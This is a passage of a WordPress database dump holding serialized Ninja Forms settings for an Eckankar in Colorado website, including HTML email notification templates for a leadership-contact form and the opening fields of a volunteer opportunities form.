Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:89;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:04\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_192}\";s:13:\"email_subject\";s:44:\"Southwest Mountain Area Initiators and ESA\'s\";s:13:\"email_message\";s:2721:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><h1>Eckankar In Colorado</h1></td><td>Â </td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello {field:textbox_190},</strong></p><p>You have created a new form submission on the Eckankar In Colorado website. Your submission is requesting contact with a person on the \"Southwest Mountain Area ECK Leadership Communications\" team.</p><p>Here is a copy of the information that you have submitted:</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_190}<br /> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_191}<br /> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_192}<br /> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_193}</span><br /> <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_194}<br /> </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166940171}</span></p><p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_198}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p>If you have any questions regarding the origin of this form, please feel free to contact the<br /> Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:90;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:04\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:11:\"success_msg\";s:360:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:91;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:04\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:44:\"Southwest Mountain Area Initiators and ESA\'s\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3928:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Southwest Mountain Area Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for theÂ <em>Southwest Mountain Area ECK Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_190}Â {field:lastname_191} </span>has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_190}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_191}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_192}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_193}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_194}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166940171}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_198}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:92;}}s:8:\"settings\";a:40:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:44:\"Southwest Mountain Area Initiators and ESA\'s\";s:10:\"created_at\";s:19:\"2019-07-15 14:07:37\";s:10:\"form_title\";s:44:\"Southwest Mountain Area Initiators and ESA\'s\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 17:57:08\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:10:{i:0;s:8:\"html_189\";i:1;s:11:\"textbox_190\";i:2;s:12:\"lastname_191\";i:3;s:9:\"email_192\";i:4;s:9:\"phone_193\";i:5;s:14:\"listselect_194\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166940171\";i:7;s:12:\"textarea_198\";i:8;s:18:\"html_1663800713464\";i:9;s:10:\"submit_200\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(24,'a:7:{s:2:\"id\";i:24;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:18:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:1034:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar in Colorado Volunteer Opportunities Page</span></span></span></strong></span></h3>\r\n<strong>\"One who gives of himself to life without any strings attached is a richer individual, because he is loving something more than himself...\"</strong>\r\n- Sri Harold Klemp, <em>Ask the Master, Book 2 </em>\r\n\r\nWe are always looking for Chelas who want to give service. Tasks or positions can be accepted to work within a group or by yourself as your interests and skills dictate.\r\n\r\nIf you are interested in any of the opportunities listed below, please use this form to let us know about your interests. Your selections will then be forwarded to the respective leaders in those areas.\r\n\r\n<em>Please note that for some positions, prior experience/training is needed e.g, to be an Arahata for a Satsang Class, prior Arahata training is needed. Some positions also require approval from within the ESC/RESA structure.</em>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:1045:\"<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar in Colorado Volunteer Opportunities <br></span></span></span></strong></span></h3>\n<strong>\"One who gives of himself to life without any strings attached is a richer individual, because he is loving something more than himself...\"</strong><br>- Sri Harold Klemp, <em>Ask the Master, Book 2</em></p><p>We are always looking for Chelas who want to give service. Tasks or positions can be accepted to work within a group or by yourself as your interests and skills dictate.\n\nIf you are interested in any of the opportunities listed below, please use this form to let us know about your interests. Your selections will then be forwarded to the respective leaders in those areas.</p><p><em>Please note that for some positions, prior experience/training is needed e.g, to be an Arahata for a Satsang Class, prior Arahata training is needed. Some positions also require approval from within the ESC/RESA structure.</em></p>\";s:3:\"key\";s:8:\"html_220\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_220\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:257;}i:1;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_221\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_221\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:258;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_222\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_222\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:259;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_223\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_223\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:260;}i:4;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"phone_224\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:9:\"phone_224\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:261;}i:5;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 